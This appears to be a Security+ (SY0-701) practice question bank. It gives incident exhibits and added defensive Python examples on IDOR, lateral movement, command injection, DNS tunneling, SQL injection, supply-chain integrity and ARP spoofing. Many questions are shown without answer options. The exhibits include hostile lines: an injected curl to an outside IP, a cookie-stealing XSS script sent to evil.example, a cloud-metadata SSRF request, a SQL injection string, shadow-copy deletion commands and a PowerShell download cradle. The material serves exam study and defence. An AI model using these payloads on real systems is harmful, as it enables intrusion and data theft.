SY0-701 Threats, Vulnerabilities, and Mitigations • Complete Question Bank
Complete SY0-701 Threats, Vulnerabilities, and Mitigations question bank with answers and detailed explanations.
Email message
From: Payroll Support <payroll-help@vendor-portal.example>
Subject: Urgent: Verify your account now
Body: We detected a payroll issue. Reply with the one-time code we just sent to your phone so we can restore your mailbox today. Failure to act within 10 minutes may suspend access.
Help desk call transcript Caller: "Hi, this is Morgan from the executive assistant team. The CFO is in a meeting and needs a transfer completed in the next 15 minutes. I am sending the approval right now. Please confirm the wire amount and account details over the phone so I can finish the request."
Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?
The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.
Threat intelligence note:
- Delivery domains change daily using disposable VPS providers
- File hashes vary because the payload is repacked for each campaign
- Email lure wording changes weekly
- The malware consistently creates a mutex named `Global\WkSvcHost_0F92`
- One case also showed a registry key under `HKCU\Software\SysTools\Cache`, but that key was not present in every sample
Based on the exhibit, what is the BEST fix for the vulnerability being exploited?
A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.
Web server access log excerpt:
10:41:12 GET /portal/document?docId=4411 200 user=jcarter
10:41:14 GET /portal/document?docId=4412 200 user=jcarter
10:41:15 GET /portal/document?docId=4413 200 user=jcarter
Application debug log:
[INFO] Document lookup completed successfully.
[WARN] No authorization check performed after object lookup.
[INFO] Returned file owner: finance2
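The exhibit shows broken object-level authorization (IDOR): the handler looks the document up by `docId` and returns it without checking that the requester is entitled to it. The following is an added example, not code from the question bank or from any product it describes; the document store, the `Forbidden` exception and the owner names are constructed to mirror the log lines. It replays the three requests from the access log against the vulnerable handler and the fixed one.

```python
# Added example (not from the question bank): the missing object-level
# authorization check from the exhibit, beside a fixed lookup.
from dataclasses import dataclass


@dataclass(frozen=True)
class Document:
    doc_id: int
    owner: str
    content: str


# Constructed sample documents; owners mirror the exhibit (jcarter, finance2).
DOCS = {
    4411: Document(4411, "jcarter", "jcarter's expense report"),
    4412: Document(4412, "finance2", "Q4 payroll summary"),
    4413: Document(4413, "finance2", "Vendor bank details"),
}


class Forbidden(Exception):
    """Raised when the requester may not read the object (constructed)."""


def get_document_vulnerable(doc_id: int, user: str) -> str:
    """Looks the object up and returns it with no check that `user` may
    read it. This is the behaviour the exhibit's WARN line describes."""
    doc = DOCS[doc_id]
    return doc.content


def get_document_fixed(doc_id: int, user: str) -> str:
    """Object-level authorization: after the lookup, verify the requester
    owns the record before returning it."""
    doc = DOCS.get(doc_id)
    if doc is None or doc.owner != user:
        # Same response for 'missing' and 'not yours' so IDs cannot be enumerated.
        raise Forbidden(f"user {user!r} may not read document {doc_id}")
    return doc.content


def audit_idor(requests):
    """Replay (user, docId) pairs the way the access log shows them and
    report which ones leaked under the vulnerable handler but are now
    refused. Returns a list of (user, docId, real owner)."""
    leaked = []
    for user, doc_id in requests:
        get_document_vulnerable(doc_id, user)      # succeeds for every row
        try:
            get_document_fixed(doc_id, user)
        except Forbidden:
            leaked.append((user, doc_id, DOCS[doc_id].owner))
    return leaked


if __name__ == "__main__":
    # Constructed replay of the three log lines in the exhibit.
    log = [("jcarter", 4411), ("jcarter", 4412), ("jcarter", 4413)]
    for user, doc_id, owner in audit_idor(log):
        print(f"IDOR: {user} read docId={doc_id} owned by {owner}")
```

The fix is the ownership comparison after the lookup, not a change to how the identifier looks: switching `docId` to a random value only makes enumeration slower, the authorization check is what closes the hole.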
Based on the exhibit, what is the MOST likely activity taking place on the network?
A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.
NetFlow and Windows event excerpt:
Host: WS-22 (10.20.5.18)
14:31 10.20.5.18 -> 10.20.5.41 TCP/445
14:32 10.20.5.18 -> 10.20.5.43 TCP/5985
14:32 10.20.5.18 -> 10.20.5.47 TCP/445
14:33 10.20.5.18 -> 10.20.5.52 TCP/5985
14:34 10.20.5.18 -> 10.20.5.61 TCP/445
Security log highlights:
Event 4769 spike for user ACME\rlopez
Event 7045: Service created on 10.20.5.43 named "PSEXESVC"
Multiple hosts show remote logon type 3 from WS-22
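The flow pattern in the exhibit (one workstation reaching several hosts on SMB and WinRM within a few minutes, backed by a PSEXESVC service install and type 3 logons) is the classic fan-out of lateral movement. The following added example, not from the question bank, shows a small detector for that fan-out run over constructed NetFlow-style lines shaped like the exhibit; the port set, the five-minute window and the target threshold are assumptions chosen for illustration.

```python
# Added example (not from the question bank): flag a source that reaches
# many distinct hosts on remote-admin ports inside a short window.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ports used for remote execution and admin sharing: SMB (PsExec-style
# service install), WinRM, RPC, RDP. Thresholds are assumptions.
ADMIN_PORTS = {445, 5985, 5986, 135, 3389}
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_TARGETS = 4

FLOW_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2})\s+(?P<src>[\d.]+)\s+->\s+(?P<dst>[\d.]+)\s+TCP/(?P<port>\d+)$"
)


def parse_flows(lines):
    """Yield (time, src, dst, port); lines that do not match are skipped."""
    for line in lines:
        m = FLOW_RE.match(line.strip())
        if not m:
            continue
        yield datetime.strptime(m["ts"], "%H:%M"), m["src"], m["dst"], int(m["port"])


def detect_fan_out(lines, window=WINDOW, min_targets=MIN_DISTINCT_TARGETS):
    """Return {src: sorted targets} for every source that reaches at least
    `min_targets` distinct hosts on admin ports within `window`."""
    by_src = defaultdict(list)
    for ts, src, dst, port in parse_flows(lines):
        if port in ADMIN_PORTS:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        # Sliding window over this source's time-ordered admin-port flows.
        for i, (start, _) in enumerate(events):
            targets = {d for t, d in events[i:] if t - start <= window}
            if len(targets) >= min_targets:
                alerts[src] = sorted(targets)
                break
    return alerts


SAMPLE_FLOWS = [  # constructed; mirrors the exhibit plus one benign flow
    "14:31 10.20.5.18 -> 10.20.5.41 TCP/445",
    "14:32 10.20.5.18 -> 10.20.5.43 TCP/5985",
    "14:32 10.20.5.18 -> 10.20.5.47 TCP/445",
    "14:33 10.20.5.18 -> 10.20.5.52 TCP/5985",
    "14:34 10.20.5.18 -> 10.20.5.61 TCP/445",
    "14:34 10.20.5.41 -> 10.20.5.9 TCP/443",   # ordinary web traffic, ignored
]

if __name__ == "__main__":
    for src, targets in detect_fan_out(SAMPLE_FLOWS).items():
        print(f"possible lateral movement from {src}: {len(targets)} hosts {targets}")
```

In practice the flow alert is corroborated with the host telemetry the exhibit lists (Event 7045 service creation, 4769 ticket requests, type 3 logons from the same source) before the account and the source host are isolated.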
Host activity log
11:22:08 Command executed: vssadmin delete shadows /all /quiet
11:22:15 Files in Finance share renamed with extension .enc
11:22:21 Ransom note created: READ_ME_NOW.txt
11:22:28 Multiple user documents no longer open correctly
Threat intelligence note
Campaign summary:
- Malicious domains change every 24 hours
- Executable file hash stays the same across samples
- TLS certificate fingerprint remains: 4F:91:2C:AA:7D:10:88:6B:...
- User agent string varies by host
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55
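The exhibit is OS command injection: the `host` value is pasted into a `/bin/sh -c` string, so the `;` in the second request starts a second command. The following added example, not code from the question bank, shows the unsafe string construction beside a hardened version that validates the input as an IP address inside an approved range and passes an argument vector with `shell=False`. The approved network (10.0.0.0/24) is an assumption for the example.

```python
# Added example (not from the question bank): the injectable shell string
# from the exhibit, beside an allowlisted argv-based replacement.
import ipaddress
import shlex
import subprocess

# Assumed allowlist of internal ranges the connectivity tool may reach.
APPROVED_NETWORKS = [ipaddress.ip_network("10.0.0.0/24")]


def vulnerable_command(host: str) -> str:
    """Mirrors the exhibit: user input is interpolated into a string that
    is handed to /bin/sh -c, so ';', '|', '$(...)' become shell syntax."""
    return f"ping -c 1 {host}"   # executed as: /bin/sh -c "<this string>"


def approved_host(host: str) -> str:
    """Fail closed: the value must parse as an IP address and fall inside
    an approved network. Hostnames and metacharacters are rejected."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError as exc:
        raise ValueError(f"not an IP address: {host!r}") from exc
    if not any(addr in net for net in APPROVED_NETWORKS):
        raise ValueError(f"{addr} is outside the approved networks")
    return str(addr)


def build_ping_command(host: str) -> list:
    """Argument vector for subprocess with shell=False: each element goes
    to ping as-is and is never interpreted by a shell."""
    return ["ping", "-c", "1", approved_host(host)]


def run_ping(host: str) -> int:
    """Execute the hardened command and return ping's exit status."""
    argv = build_ping_command(host)
    return subprocess.run(argv, shell=False, timeout=5, check=False).returncode


if __name__ == "__main__":
    payload = "10.0.0.15;curl http://198.51.100.55/s"   # from the exhibit
    print("shell would run:", vulnerable_command(payload))
    try:
        build_ping_command(payload)
    except ValueError as err:
        print("rejected:", err)
    print("safe argv:", shlex.join(build_ping_command("10.0.0.15")))
```

Escaping the input and keeping `shell=True` is the weaker fix: the allowlist plus `shell=False` removes the shell from the path entirely, so there is nothing left to escape.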
Based on the exhibit, what is the BEST immediate containment action?
The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.
EDR event timeline:
14:02:11 excel.exe spawned powershell.exe with -enc parameter
14:02:13 powershell.exe created scheduled task: "OneDrive Update"
14:02:18 explorer.exe began renaming multiple .docx files to .lock
14:02:21 outbound HTTPS connection to 198.51.100.77:443
14:02:24 security service attempted to terminate, then recovered
Based on the exhibit, which issue should be remediated FIRST?
The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.
Vulnerability scan summary:
1) Internet-facing VPN appliance
   CVSS: 8.8
   Exploit status: public proof-of-concept available
   Exposure: reachable from the internet
   Compensating controls: none
2) Internal HR file server
   CVSS: 9.8
   Exploit status: no public exploit yet
   Exposure: reachable only from the employee VLAN
   Compensating controls: segmented network and MFA for admin access
3) Lab workstation
   CVSS: 10.0
   Exploit status: public exploit available
   Exposure: isolated lab VLAN with no routing to production
4) DMZ reporting server
   CVSS: 7.5
   Exploit status: public exploit available
   Exposure: internet-reachable, but protected by WAF and IP allowlisting
Based on the exhibit, what is the MOST likely explanation for the network traffic?
The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.
DNS query log excerpt:
Host: CORP-LT-17
16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN
16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN
16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN
16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN
16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN
Proxy log excerpt:
No corresponding HTTP or HTTPS sessions observed
TTL observed: 60 seconds on all queries
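The exhibit's signals are many unique, random-looking leftmost labels under one parent domain, every answer NXDOMAIN, and no web session to go with them, which points at DNS being used as the channel itself (tunneling or a domain-generation algorithm) rather than as a prelude to an HTTP connection. The following added example, not from the question bank, scores constructed query lines shaped like the exhibit on exactly those three properties. The entropy and ratio thresholds are assumptions; the parent-domain split is a two-label approximation, not a public-suffix lookup.

```python
# Added example (not from the question bank): per-parent-domain scoring of
# DNS query lines for DGA / tunneling traits seen in the exhibit.
import math
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^\d{2}:\d{2}:\d{2}\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+(?P<rcode>\S+)$"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; random 9-character labels score close to log2(9)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname: str) -> str:
    """Registered-domain approximation: the last two labels (no PSL here)."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def analyze_dns(lines, min_queries=5, min_entropy=2.8, nx_ratio=0.8, unique_ratio=0.9):
    """Group queries by parent domain and flag parents whose leftmost labels
    are mostly unique and high-entropy and whose answers are mostly NXDOMAIN."""
    per_parent = defaultdict(lambda: {"labels": set(), "nx": 0, "total": 0})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        qname = m["qname"].lower()
        bucket = per_parent[parent_domain(qname)]
        bucket["labels"].add(qname.split(".")[0])
        bucket["total"] += 1
        bucket["nx"] += int(m["rcode"] == "NXDOMAIN")
    suspects = {}
    for parent, b in per_parent.items():
        if b["total"] < min_queries:
            continue
        mean_entropy = sum(shannon_entropy(l) for l in b["labels"]) / len(b["labels"])
        nx = b["nx"] / b["total"]
        uniq = len(b["labels"]) / b["total"]
        if uniq >= unique_ratio and mean_entropy >= min_entropy and nx >= nx_ratio:
            suspects[parent] = {
                "queries": b["total"],
                "entropy": round(mean_entropy, 2),
                "nxdomain_ratio": nx,
            }
    return suspects


SAMPLE = [  # constructed; the first five lines mirror the exhibit
    "16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN",
    "16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN",
    "16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN",
    "16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN",
    "16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN",
    "16:18:07 www.example.com A NOERROR",
    "16:18:08 www.example.com A NOERROR",
]

if __name__ == "__main__":
    for parent, stats in analyze_dns(SAMPLE).items():
        print(f"suspect {parent}: {stats}")
```

A single NXDOMAIN burst can also be a misconfigured agent, so the detector reports per parent domain; the absence of any matching proxy session, as the exhibit notes, is what separates DNS-as-channel from a failed normal lookup.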
Based on the exhibit, what is the BEST response by the employee?
The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.
Email header and body excerpt:
From: "IT Helpdesk" <help@corp-support.example>
Reply-To: support@mail-secure-login.com
Subject: URGENT: MFA re-sync required
Body: "Your mailbox will be suspended in 15 minutes. To complete the repair, reply with the 6-digit code that was just sent to your phone. If you do not respond now, your account will be locked."
EDR timeline from a finance laptop:
08:14:02 winword.exe launched powershell.exe
08:14:03 powershell.exe executed with arguments: -WindowStyle Hidden -NoProfile -EncodedCommand SQBFAFgAKAAuLi4=
08:14:05 No new executable written to disk
08:14:08 Outbound HTTPS connection to 198.51.100.77 over port 443
08:14:11 User reports a document opened normally, but the machine began showing unusual network activity
Web application log excerpt:
Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.
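The developer note names the flaw: the search term is concatenated into the SQL text, so a quote in the input ends the string literal and the rest is parsed as SQL. The following added example, not from the question bank, runs the exhibit's payload against a constructed in-memory SQLite table through both a concatenated query and a parameterized one. The table, its rows and the LIKE-based query shape are assumptions for illustration; on the exhibit's own database the payload produced a syntax error, here it produces the data leak the same mistake allows when the surrounding query happens to parse.

```python
# Added example (not from the question bank): string-concatenated search
# versus placeholder binding, shown against a constructed SQLite table.
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed catalogue: 'secret' rows must never be returned by search."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO products (name, secret) VALUES (?, ?)",
        [("acme widget", 0), ("acme gadget", 0), ("internal prototype", 1)],
    )
    return conn


def search_vulnerable(conn, q: str):
    """Appends user input straight into the SQL text, as the developer note
    describes. A quote in `q` closes the literal early and the remainder is
    parsed as SQL; '--' then comments out the rest of the statement."""
    sql = "SELECT name FROM products WHERE secret = 0 AND name LIKE '%" + q + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, q: str):
    """Placeholder binding: the value travels separately from the statement,
    so it cannot change the statement's structure whatever it contains."""
    sql = "SELECT name FROM products WHERE secret = 0 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]


PAYLOAD = "acme' OR '1'='1'--"   # the value from the exhibit's request


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable:    ", search_vulnerable(conn, PAYLOAD))     # every row, secret included
    print("parameterized: ", search_parameterized(conn, PAYLOAD))  # no match at all
    print("normal search: ", search_parameterized(conn, "acme"))
```

Binding fixes the injection; it does not make `%` and `_` in the input inert for LIKE, so an application that should not let users supply wildcards still has to escape those two characters or validate the term separately.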
Configuration review output from a new network camera deployment:
Interface status:
0.0.0.0:8080 LISTEN camera-web
0.0.0.0:554 LISTEN rtsp-stream
Admin banner: Firmware version 1.0.3
Admin login: enabled
Password policy: not enforced
Firewall ACL:
allow tcp any any eq 8080
allow tcp any any eq 554
Network capture summary:
Host 10.20.14.25 sends ARP requests for 10.20.14.1
Multiple ARP replies received:
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 02:42:ac:11:00:05
10.20.14.1 is-at 66:77:88:99:aa:bb
Client gateway cache alternates between the legitimate gateway MAC and 66:77:88:99:aa:bb every few seconds.
Users report brief certificate warnings when opening internal sites.
File server FS-02:
C:\Shared\Finance\Q4\APR_invoice.xlsx -> APR_invoice.xlsx.locked
C:\Shared\Finance\Q4\Budget2026.docx -> Budget2026.docx.locked
C:\Shared\Finance\Q4\README_RECOVER.txt created in every directory
Command history from the server console:
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
Users report they can see filenames but cannot open the files.
From: BrightStone Invoices <billing@brightstone-payments.com>
Reply-To: Accounts Payable <ap@brightstone-invoices.net>
Subject: Updated remittance details for PO 44718
Hello Dana,
Please see the attached invoice addendum for the Orion office renovation project we completed last month. To avoid a late fee, send the balance today to the new bank account listed in the PDF.
Thank you,
BrightStone Billing
Support ticket excerpt:
A customer posted the following in a public product review field:
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>
The same script later appeared in the review page for other visitors, and the security team found several unexpected requests to the attacker-controlled domain.
Help desk incident notes:
- User installed a free video converter from an unofficial download site.
- Browser home page changed without permission.
- A new extension appeared named "QuickSearch Helper".
- Outbound traffic to tracking.example-cdn.net increased every few minutes.
- The endpoint security console reports that saved browser cookies were accessed by an unknown process.
Email header excerpt:
From: "Evan Brooks" <evan.brooks@northstar-invoices.co>
To: ap-team@contoso.example
Subject: Updated pricing for Project Orion - action needed today
Message body:
Hi Lena,
Per our call last week about Project Orion, please review the revised pricing sheet attached. The customer asked for approval before 3:00 PM so we can keep the launch on schedule. If the file does not open, reply here and I will send a new link.
External vulnerability scan summary for a small branch office server:
Host: 203.0.113.44
Open ports:
22/tcp open ssh
80/tcp open http
5900/tcp open vnc
Findings:
- VNC authentication: disabled
- SSH: restricted to password login only
- Web admin page accessible from any source network
- Server is in the DMZ and stores customer support tickets
Help desk voicemail transcript: "Hi, this is Elena from identity operations. I opened ticket INC-7712 because your MFA app is out of sync. Read me the 6-digit code that just arrived so I can clear the lockout before payroll closes."
Ticketing system: no open ticket INC-7712 exists
Caller ID displayed: corporate main line
Wireless scan from the lobby:
SSID: CorpWiFi   BSSID: 18:AA:10:22:44:60   Signal: -78 dBm
SSID: CorpWiFi   BSSID: 7C:22:90:11:33:AA   Signal: -41 dBm
SSID: CorpGuest  BSSID: 18:AA:10:22:44:61   Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
Packet Capture Summary
Host 10.20.30.44 sends repeated ARP replies:
"10.20.30.1 is at 00:11:22:33:44:55"
"10.20.30.1 is at 00:11:22:33:44:55"
Switch logs:
DHCP snooping: disabled
ARP inspection: disabled
Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.
Task Scheduler entry on FIN-SRV2:
Task Name: MonthlyCleanup
Trigger: 12/31/2026 18:00
Action: powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\cleanup.ps1
Script contents:
if ($env:USERNAME -eq 'j.smith') { Remove-Item C:\Finance\Archive\* -Recurse -Force }
Security note: The script was added by a former contractor before departure.
EDR Alert - WS-14
Time: 03:14:22
Parent process: svchost.exe
Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <redacted>
Network activity: HTTPS request to hxxps://updates-check[.]com/a7
File creation: none detected
Registry change: Run key modified under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Application log excerpt:
GET /thumbnail?imageUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/
Response status: 200
Returned content includes cloud role names and temporary credentials metadata
Web server outbound connection recorded to the local metadata address
Build pipeline notes:
- Package manager updated dependency: "fast-logger" from 2.4.1 to 2.4.2
- New outbound connection at startup: api.fast-logger-support[.]com
- No code changes were made by the development team
- Security review note: "Dependency source is a recently created public repository account"
CI Build Output
Downloading package: report-utils@4.2.0
Expected integrity: sha512-F3d9e2f0e3a9c1...
Actual integrity: sha512-7ab4d1c19f0a22...
Source registry: registry.example.net
Build status: WARN - package checksum mismatch
Developer note: The update was pulled automatically during the nightly pipeline.
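The exhibit's pipeline recomputed the package's integrity value, saw it differ from the pinned one, and only warned. The following added example, not from the question bank or any package manager's own code, shows what the check should do: recompute the `sha512-<base64>` value over the downloaded bytes, compare it in constant time with the lockfile value, and refuse to proceed on mismatch. The package bytes and the "lockfile" value are constructed stand-ins.

```python
# Added example (not from the question bank): fail-closed verification of a
# downloaded package against a pinned Subresource-Integrity style digest.
import base64
import hashlib
import hmac


class IntegrityError(Exception):
    """Raised when the recomputed digest differs from the pinned one."""


def sri_digest(data: bytes, algo: str = "sha512") -> str:
    """'<algo>-<base64 digest>' in the form lockfiles and CI output use."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError(f"unsupported algorithm {algo!r}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_package(name: str, data: bytes, expected: str) -> str:
    """Recompute the integrity value with the algorithm the pin names and
    compare in constant time. Raises so the caller cannot warn and continue."""
    algo, _, _ = expected.partition("-")
    actual = sri_digest(data, algo)
    if not hmac.compare_digest(actual.encode(), expected.encode()):
        raise IntegrityError(f"{name}: expected {expected[:24]}..., got {actual[:24]}...")
    return actual


# Constructed stand-ins for the tarball the lockfile pinned and a tampered copy.
PINNED_TARBALL = b"report-utils 4.2.0 (original contents)"
TAMPERED_TARBALL = b"report-utils 4.2.0 (original contents) + injected postinstall"
LOCKFILE_INTEGRITY = sri_digest(PINNED_TARBALL)   # what the lockfile would hold


def install_decision(name: str, data: bytes, expected: str) -> bool:
    """True only when verification passes; False means abort the build."""
    try:
        verify_package(name, data, expected)
        return True
    except IntegrityError as err:
        print("BUILD FAILED:", err)
        return False


if __name__ == "__main__":
    print(install_decision("report-utils@4.2.0", PINNED_TARBALL, LOCKFILE_INTEGRITY))
    print(install_decision("report-utils@4.2.0", TAMPERED_TARBALL, LOCKFILE_INTEGRITY))
```

The value being compared must come from the committed lockfile, not from the registry response that delivered the package, otherwise a compromised registry supplies both the artifact and the digest that "verifies" it.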
Reverse proxy config excerpt:
proxy_set_header X-Original-URL $request_uri;
proxy_set_header X-Forwarded-User $remote_user;
Access log:
GET /app/report HTTP/1.1 200
X-Original-URL: /admin/export
X-Forwarded-User: jlee
Backend log:
09:41:11 GET /admin/export user=jlee role=analyst response=200
09:41:13 POST /admin/export user=jlee role=analyst response=200
Vulnerability review summary:
Finding A: CVE-2025-1184 | DMZ web server | Internet-facing | Remote code execution | Exploit in the wild | Patch available
Finding B: CVE-2025-4420 | Engineering laptop | Internal-only lab VLAN | CVSS 9.8 | Requires local access | No network path
Finding C: CVE-2025-6011 | File server | Internal network | Requires authenticated user | Compensating ACL restricts access
Finding D: CVE-2025-7044 | Backup appliance | Internal network | No patch yet | Vendor says issue is unreachable from network
EDR summary:
- Parent process: taskeng.exe
- Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ...
- No new executable files were created in user profile folders
- Scheduled task 'UpdateSvc' launches every 5 minutes
- Outbound TLS connections to 198.51.100.77 occur immediately after execution
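Three exhibits on this page (the Excel-spawned `-enc` launch, the finance laptop timeline with `-EncodedCommand SQBFAFgAKAAuLi4=`, and this scheduled-task summary) turn on the same artifact: a hidden PowerShell process carrying a base64 payload and no file dropped to disk. The following added example, not from the question bank, decodes that parameter the way PowerShell does (base64 over UTF-16LE text) and flags the tokens an analyst looks for first. The suspicious-token list is an assumption; the sample script and command line are constructed.

```python
# Added example (not from the question bank): decode -EncodedCommand
# payloads from command lines and flag fileless-execution indicators.
import base64
import re

# Assumed indicator list; tune to the environment.
SUSPICIOUS = [
    "iex", "invoke-expression", "downloadstring", "frombase64string",
    "net.webclient", "invoke-webrequest", "hidden", "bypass",
]

CMDLINE_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """What `powershell -EncodedCommand` expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Inverse of the above; tolerates stripped '=' padding and a truncated
    final code unit (replaced rather than raised) so partial EDR captures
    still yield their readable prefix."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def extract_encoded(cmdline: str):
    """Return the base64 argument following any -e/-ec/-enc/-EncodedCommand."""
    m = CMDLINE_RE.search(cmdline)
    return m.group(1) if m else None


def triage_cmdline(cmdline: str) -> dict:
    """Decode the payload (if any) and list which indicators appear in the
    decoded script or in the visible command line."""
    blob = extract_encoded(cmdline)
    decoded = decode_encoded_command(blob) if blob else ""
    haystack = (decoded + "\n" + cmdline).lower()
    hits = [t for t in SUSPICIOUS if t in haystack]
    return {"decoded": decoded, "hits": hits, "suspicious": bool(hits)}


# Constructed sample: a download cradle of the kind the exhibits describe.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.77/a')"
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_powershell(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    result = triage_cmdline(SAMPLE_CMDLINE)
    print("decoded:", result["decoded"])
    print("hits:   ", result["hits"])
```

The truncated blob shown in the finance-laptop exhibit, `SQBFAFgAKAAuLi4=`, decodes with this routine to `IEX(` followed by the ellipsis bytes, which is enough to know the payload was an in-memory invocation even though the rest was cut off.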
Host 192.0.2.45 arp -a
Internet Address      Physical Address      Type
192.0.2.1             00-50-56-a1-b2-c3     dynamic
192.0.2.1             00-50-56-a1-b2-c4     dynamic
Packet capture:
10:14:02 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:03 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:05 Gateway traffic is briefly forwarded to 192.0.2.200
Switch CAM table:
Gi1/0/7  00:50:56:a1:b2:c4
Gi1/0/24 00:50:56:a1:b2:c4
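All three ARP exhibits on this page (the alternating gateway MAC with certificate warnings, the unsolicited "is at" replies with DHCP snooping and ARP inspection disabled, and the `arp -a` table above with one gateway IP and two MACs) share one observable: a single IP claimed by more than one hardware address. The following added example, not from the question bank, parses both `arp -a` rows and capture-style `is-at` lines and flags such conflicts, optionally against a trusted static mapping of the real gateway. The trusted table and the sample lines are constructed.

```python
# Added example (not from the question bank): detect one IP claimed by
# several MAC addresses in ARP tables and capture summaries.
import re
from collections import defaultdict

# Matches "192.0.2.1 00-50-56-a1-b2-c3 dynamic" (arp -a) and
# "192.0.2.1 is-at 00:50:56:a1:b2:c4" / "... is at ..." (capture lines).
ARP_RE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?:is[- ]at\s+)?"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})"
)


def normalize_mac(mac: str) -> str:
    """Lower-case, colon-separated, so Windows and capture formats compare."""
    return mac.lower().replace("-", ":")


def parse_arp_claims(lines):
    """Return {ip: {mac, ...}} for every IP-to-MAC claim found in the lines."""
    claims = defaultdict(set)
    for line in lines:
        for m in ARP_RE.finditer(line):
            claims[m["ip"]].add(normalize_mac(m["mac"]))
    return claims


def detect_arp_conflicts(lines, trusted=None):
    """Flag IPs claimed by more than one MAC, or by a MAC that differs from
    a trusted static mapping. Returns {ip: {"claimed": [...], "rogue": [...]}};
    'rogue' is only populated when a trusted mapping for that IP exists."""
    trusted = {ip: normalize_mac(mac) for ip, mac in (trusted or {}).items()}
    alerts = {}
    for ip, macs in parse_arp_claims(lines).items():
        rogue = {m for m in macs if ip in trusted and m != trusted[ip]}
        if len(macs) > 1 or rogue:
            alerts[ip] = {"claimed": sorted(macs), "rogue": sorted(rogue)}
    return alerts


SAMPLE_LINES = [  # constructed; mirrors the arp -a and capture rows above
    "192.0.2.1 00-50-56-a1-b2-c3 dynamic",
    "192.0.2.1 00-50-56-a1-b2-c4 dynamic",
    "10:14:02 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4",
    "10:14:03 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4",
    "192.0.2.45 00-50-56-aa-bb-cc dynamic",   # ordinary host entry
]
TRUSTED_GATEWAYS = {"192.0.2.1": "00:50:56:a1:b2:c3"}   # assumed static record

if __name__ == "__main__":
    for ip, info in detect_arp_conflicts(SAMPLE_LINES, TRUSTED_GATEWAYS).items():
        print(f"ARP conflict for {ip}: claimed {info['claimed']}, rogue {info['rogue']}")
```

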